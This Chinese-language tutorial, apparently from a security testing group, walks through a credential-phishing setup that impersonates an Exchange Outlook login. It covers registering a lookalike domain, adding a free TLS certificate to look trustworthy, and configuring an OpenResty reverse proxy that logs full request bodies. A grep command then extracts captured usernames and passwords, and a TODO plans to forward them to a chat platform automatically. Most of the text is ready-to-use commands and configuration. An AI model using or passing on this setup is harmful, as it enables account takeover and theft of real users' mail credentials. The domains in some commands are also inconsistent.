基于Nginx反向代理水坑攻擊

STATEMENT

聲明

由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負責，雷神眾測及文章作者不為此承擔任何責任。

雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章，必須保證此文章的完整性，包括版權聲明等全部內容。未經雷神眾測允許，不得任意修改或者增減此文章內容，不得以任何方式將其用于商業目的。

具體步驟 

說明：除了域名發生了變化其他不會影響該站點的任何功能，省去了克隆站點等其他繁瑣的步驟。

場景: 偽裝成目標 exchange outlook 登錄，誘騙用戶輸入賬號密碼。

偽造相似域名：mail.exchange-`0`utlook.com

被仿冒域名：mail.exchange-outlook.com

購置域名 mail.exchange-`0`utlook.com 并A記錄解析至服務器。

在該服務器部署安裝certbot、openresty具體操作步驟如下。

更新源并安裝可能需要的依賴。

apt-get update -y apt-get install -y libpcre3-dev libssl-dev perl make build-essential curl zlib1g-dev

Ubuntu安裝Certbot（根據版本選擇如下命令進行安裝）。

apt install certbot python3-certbot-nginxapt install certbot python-certbot-nginx

使用Certbot配置免費ssl證書，增加可信度。

certbot --nginx -d mail.sfitshfe.com

運行后正常Certbot會自動檢測nginx對應域名的配置文件路徑并提示是否要全部轉跳到https，選擇1后配置完成，并且nginx會幫你重新加載配置文件，重新打開網站已經支持https訪問了，因為是免費的證書，所以只有90天有效期。

certbot certificates  # 可以查看證書的狀態certbot renow  # 證書到期30天前可以自動更新certbot revoke # 撤銷證書certbot delete # 撤銷后刪除證

查看證書的狀態及路徑。

root@10-7-16-132:/home/ubuntu# certbot certificatesSaving debug log to /var/log/letsencrypt/letsencrypt.log
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Found the following certs:  Certificate Name: mail.exchange-0utlook.com    Domains: mail.exchange-0utlook.com    Expiry Date: 2022-09-08 03:09:57+00:00 (VALID: 86 days)    Certificate Path: /etc/letsencrypt/live/mail.exchange-0utlook.com/fullchain.pem    Private Key Path: /etc/letsencrypt/live/mail.exchange-0utlook.com/privkey.pem- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Ububtu安裝openresty [install_openresty.sh]

(https://gist.github.com/k8scat/0adca267c15ae9f3ed39770803e82ec3# file-install_openresty-sh)。

#!/bin/bashset -erm -rf openresty-1.19.3.2 openresty-1.19.3.2.tar.gz
apt-get update -yapt-get install -y libpcre3-dev \  libssl-dev \  perl \  make \  build-essential \  curl \  zlib1g-dev
curl -LO https://openresty.org/download/openresty-1.19.3.2.tar.gztar zxf openresty-1.19.3.2.tar.gzcd openresty-1.19.3.2
./configure \  --with-http_gzip_static_module \  --with-http_v2_module \  --with-http_stub_status_module
makemake install
mkdir -p /usr/lib/systemd/systemcat > /tmp/openresty.service <# Stop dance for OpenResty# =========================## ExecStop sends SIGSTOP (graceful stop) to OpenResty's nginx process.# If, after 5s (--retry QUIT/5) nginx is still running, systemd takes control# and sends SIGTERM (fast shutdown) to the main process.# After another 5s (TimeoutStopSec=5), and if nginx is alive, systemd sends# SIGKILL to all the remaining processes in the process group (KillMode=mixed).## nginx signals reference doc:# http://nginx.org/en/docs/control.html#[Unit]Description=The OpenResty Application PlatformAfter=syslog.target network-online.target remote-fs.target nss-lookup.targetWants=network-online.target[Service]Type=forkingPIDFile=/usr/local/openresty/nginx/logs/nginx.pidExecStartPre=/usr/local/openresty/nginx/sbin/nginx -t -q -g 'daemon on; master_process on;'ExecStart=/usr/local/openresty/nginx/sbin/nginx -g 'daemon on; master_process on;'ExecReload=/usr/local/openresty/nginx/sbin/nginx -g 'daemon on; master_process on;' -s reloadExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /usr/local/openresty/nginx/logs/nginx.pidTimeoutStopSec=5KillMode=mixed[Install]WantedBy=multi-user.targetEOF
# systemctl enable openresty# systemctl start openresty# systemctl status openresty
rm -rf openresty-1.19.3.2 openresty-1.19.3.2.tar.gz```

創建或編輯配置文件/etc/openresty/nginx.conf（建議修改覆蓋前備份默認配置文件）。

worker_processes  1;#error_log  logs/error.log;#error_log  logs/error.log  notice;#error_log  logs/error.log  info;#pid        logs/nginx.pid;
events {    worker_connections  1024;}
http {    include       mime.types;    default_type  application/octet-stream;    log_format  logeverything  '======$current_time - $remote_addr$request_headers$request_body=======';    keepalive_timeout  65;  server {    set $request_headers "";        set $current_time "";    root /var/www/html;    # Add index.php to the list if you are using PHP    index index.html index.htm index.nginx-debian.html;    server_name mail.exchange-0utlook.com; # managed by Certbot    listen [::]:443 ssl ipv6only=on; # managed by Certbot    listen 443 ssl; # managed by Certbot    ssl_certificate /etc/letsencrypt/live/mail.exchange-0utlook.com/fullchain.pem; # managed by Certbot    ssl_certificate_key /etc/letsencrypt/live/mail.exchange-0utlook.com/privkey.pem; # managed by Certbot    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot    location / {      proxy_pass https://mail.exchange-outlook.com/;      proxy_set_header       Host $host;      proxy_cookie_domain  mail.exchange-outlook.com $host;  # 此處被仿冒站點      proxy_set_header referer "https://mail.exchange-outlook.com$request_uri"; # 此處被仿冒站點      proxy_set_header User-Agent $http_user_agent;        proxy_set_header X-Real-IP $remote_addr;      proxy_set_header REMOTE-HOST $remote_addr;      proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;      proxy_connect_timeout 300;      proxy_buffering off;      proxy_send_timeout 300;    }      access_log  logs/cool.log  logeverything;   # http 數據結果文件  }
}

執行命令啟動nginx并加載配置文件。

/usr/local/openresty/nginx/sbin/nginx -c /etc/openresty/nginx.conf
nginx啟動：/usr/local/openresty/nginx/sbin/nginx。nginx關閉：/usr/local/openresty/nginx/sbin/nginx -s stop。nginx重新加載配置：/usr/local/openresty/nginx/sbin/nginx -s reload。

訪問兩個站點效果：

訪問https://mail.sfitshfe.com/ 并輸入賬號密碼，查看保存的賬號密碼。

cat /usr/local/openresty/nginx/logs/cool.log | grep -oE 'username=(.*?)&password=(.*?)'

TODO：因為該項目比較倉促個人感覺需要做個文件監控腳本，并將特定字段（賬號密碼）自動推送到釘釘或其他平臺。

參考

OpenResty 使用介紹：

https://www.runoob.com/w3cnote/openresty-intro.html

Certbot 1.28.0 documentation：

https://eff-certbot.readthedocs.io/en/stable/index.html

如何使用 Certbot 免費申請 https 證書：

https://www.zhihu.com/question/484431835/answer/2262502859